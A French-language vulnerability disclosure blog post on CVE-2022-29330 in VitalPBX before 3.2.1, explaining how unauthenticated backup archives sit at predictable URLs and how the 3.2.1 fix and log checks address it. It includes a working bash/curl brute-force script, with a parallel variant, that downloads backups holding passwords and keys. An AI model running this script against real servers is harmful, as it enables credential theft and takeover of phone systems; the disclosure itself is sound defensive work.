CVE-2022-29330 - Vulnérabilité dans VitalPBX < 3.2.1

Alors que nous jouions avec configurions notre VitalPBX tranquillement, nous avons découvert une vulnérabilité relativement facile à mettre en œuvre et donnant accès à des données qu’on ne devrait pas pouvoir lire librement (i.e. les mot de passe des extensions, mais pas que). Voici comment elle fonctionne... et pourquoi vous devriez mettre votre version à jours.

Inutile pour une famille, donc indispensable pour une famille geek, nous avons un IPBX à la maison. Parmi les nombreux logiciels sur le marché, nous avons installé un VitalPBX dans une machine virtuelle connectée au reste de notre réseau et qui fait le lien entre nos téléphones IP (des IP-8815) et nos lignes externes analogiques (via une passerelle HX4G connectée aux boxes des FAI).

Au fil de nos aventures dans ce monde merveilleux de la VoIP, nous avons expérimenté plein d’astuces qui nous permettent d’avoir, @home, toutes les fonctionnalités qu’on attend d’un système téléphonique d’entreprise (ou d’hôtel) : groupe de sonnerie, messagerie vocale et test de turing (pour éviter les robots d’appel)...

© Rodrigo SalomonHC @ pixabay
© Rodrigo SalomonHC @ pixabay

Dernière en date : la sauvegarde (parce que les sauvegardes, c’est important). C’est vrai que vu notre infrastructure, ce serveur est rapide à installer et les rares données qu’il contient peuvent être perdues, on aurait donc pu faire l’impasse. Le truc, c’est qu’en tant qu’experts judiciaire, on ne se voit pas intervenir pour des juges et des entreprises sans savoir de quoi on parle (et aussi parce qu’au fond, configurer des serveurs, on aime ça).

Et c’est justement en cherchant à configurer le système de sauvegarde, ou plutôt à l’automatiser, que nous avons découvert cette vulnérabilité...

Les fichiers de sauvegardes étaient accessibles via l’interface web sans aucune restriction et donnent accès, en clair, aux mots de passe aux clés cryptographiques et aux boites vocales (entre autre). Heureusement, c’est corrigé depuis le 4 mai (version 3.2.1) donc mettez votre système à jours.

La sauvegarde chez VitalPBX

La configuration des sauvegardes de VitalPBX se fait via l’interface d’administration web. Une fois connecté, vous devez vous rendre dans « admin / Tools / Backup & Restore ». Le formulaire présenté par défaut permet de créer un nouveau profil de sauvegarde, avec au minimum, un nom.

Créer un profil de sauvegarde
Créer un profil de sauvegarde

Une fois vos profils de sauvegarde créés, vous pouvez les lister via l’icone de menu (icone de liste à puce) puis y accéder en cliquant sur leur nom. Le nouvel écran reprend le formulaire de configuration et ajoute la liste des sauvegardes déjà effectuée (dans la limite configurée plus haut), vous permet d’en restauter une (bouton icone du bouton de restauration à droite dans la ligne correspondante) et de créer de nouveaux points de sauvegarde (bouton icone de nouvelle sauvegarde en bas à gauche de l’écran).

Détail d’un profil de sauvegarde
Détail d’un profil de sauvegarde

Si vous voulez faire des sauvegardes automatiquement, il faut d’abord ajouter un profile de tâche automatique (via le menu « PBX / Tools / cron profiles ») car tant qu’il n’y en a pas, le champ Run automatically ne poropose que la valeure disabled).

Vulnérabilités des fichiers de sauvegardes

Comme vous l’aviez peut être vu, l’interface web propose aussi un bouton icone de téléchargement pour télécharger un point de sauvegarde. En cliquant dessus, vous obtiendrez alors une archive au format tar que vous pourriez sauvegarder de votre côté. Ce n’est pas évident parce qu’il nous cache les détails (il est opaque) mais ce bouton ne fait que rediriger votre navigateur vers l’adresse du fichier qui pourrait ressembler à ce qui suit :

https://monipbx.monreseau.lan/static/backup/c4ca4238a0b923820dcc509a6f75849b/vitalpbx-1650260415.tar

Ça n’a l’air de rien vu comme ça mais en vérifiant les détails, vous allez voir que ça va poser problème.

Téléchargement sans contrôle d’accès

La configuration du serveur web se trouve, comme toujours sur les Red Hat, dans /etc/httpd/conf.d/ et plus particulièrement, le fichier vitalpbx.conf. On y trouve la configuration des vhosts (serveurs web virtuels) utilisés par vitalpbx, dont celui de l’interface d’administration web qui nous intéresse et dont voici un extrait :

<VirtualHost *:443>
        ...
        <Directory "/var/lib/vitalpbx/static">
                Require all granted
        </Directory>
        Alias /static "/var/lib/vitalpbx/static"
        ...
</VirtualHost>

Si on le lit du bas en haut, on apprend que le préfixe /static dans l’adresse est en fait un alias qui correspond au répertoire /var/lib/vitalpbx/static. Puis (ou plutôt avant) que ce répertoire est en libre accès (Require all granted). Aucun code PHP, aucune ligne de configuration ou fichier .htaccess ne viendra tempérer cette absence de contrôle d’accès.

Si on connait l’adresse d’un fichier, on peut y accéder sans contrainte.

Seule consolation, le serveur ne permet pas de lister les fichiers dans un répertoire ; si vous accédez à https://monipbx.monreseau.lan/static/backup/, le système vous retournera une erreur 403 - Forbidden (vous n’avez pas le droit de voir le contenu du répertoire).

Adresse déterministe

Il faut donc deviner le reste de l’adresse des fichiers de sauvegarde...

c4ca4238a0b923820dcc509a6f75849b/vitalpbx-1650260415.tar

Tout ce qu’il faut, c’est trouver un identifiant de profil et un timestamp valide, deux informations dont les valeurs suivent des suites toutes simples.

On peut énumérer les profiles (nombres entiers consécutifs) et les timestamps (à rebours à partir de maintenant) jusqu’à trouver un fichier de sauvegarde.

L’exploitation

Plutôt que tester ces possibilités à la main, on peut automatiser tout ça. Voici une solution en bash 😉. Pour faire court, on teste tous les timestamps sur les dernières 24 heures, pour les 10 premiers profiles. Et on quitte le script dès que curl a trouvé quelque chose.

#!/bin/bash

now=$(date +%s)
past=$(date -d "1 day ago" +%s)

for profile in $(seq 1 10) ; do
    md5=$(echo -n $profile | md5sum | sed -e "s/ .*//")

    curl -sk "https://localhost/static/backup/$md5/" -o /dev/null -w "%{http_code}" | grep -q "404" && continue

    for timestamp in $(seq $now -1 $past) ; do
        curl -fJOsk "https://monipbx.monreseau.lan/static/backup/$md5/vitalpbx-$timestamp.tar" && exit 1
    done
done

Si vous êtes pressé, on peut accélérer tout ça avec un peu de parallélisme sur les appels à curl. Pour ça, on va modifier la boucle intérieure et directement passer le résultat de seq à xargs.

    export md5=$(echo -n $profile | md5sum | sed -e "s/ .*//")
    ...
    seq $now -1 $past | xargs -P 10 -I % bash -c \
        'curl -fJOsk "https://localhost/static/backup/$md5/vitalpbx-%.tar" && exit 255' \
        || exit 1

Impact

Le fichier de sauvegarde est une archive tar contenant d’autres archives (gz et tar.gz). Et parmi tout ce qui est sauvegardé, quelques éléments sont particulièrement intéressant...

Donc, si quelqu’un a la main sur votre fichier de sauvegarde, il peut :

Et une fois qu'on a le mot de passe de l'administrateur, on peut tout faire.

Correction

Telesoft S.A a corrigé cette vulnérabilité dans la version 3.2.1, une fois mis à jours, votre serveur n’est donc plus vulnérable à cette attaque 🎉.

Dans le détail, les fichiers de sauvegardes ne sont plus accessible directement (ils sont déplacés dans /var/lib/vitalpbx/backup, en dehors des répertoires accessibles par apache) et nécessitent donc passer par l’interface utilisateur en PHP qui fait les vérifications d’authentification.

Pour savoir si votre installation a été victime de cette attaque, vous pouvez regarder les journaux du serveur web. Ils se trouvent dans /var/log/httpd, une recherche sur /static/backup vous dira si des accès ont eu lieu. Si vous constatez des accès, et si vous voulez rester prudent, changez vos clés TLS et les mots de passe (extensions et pour être prudent, utilisateurs).

Historique de publication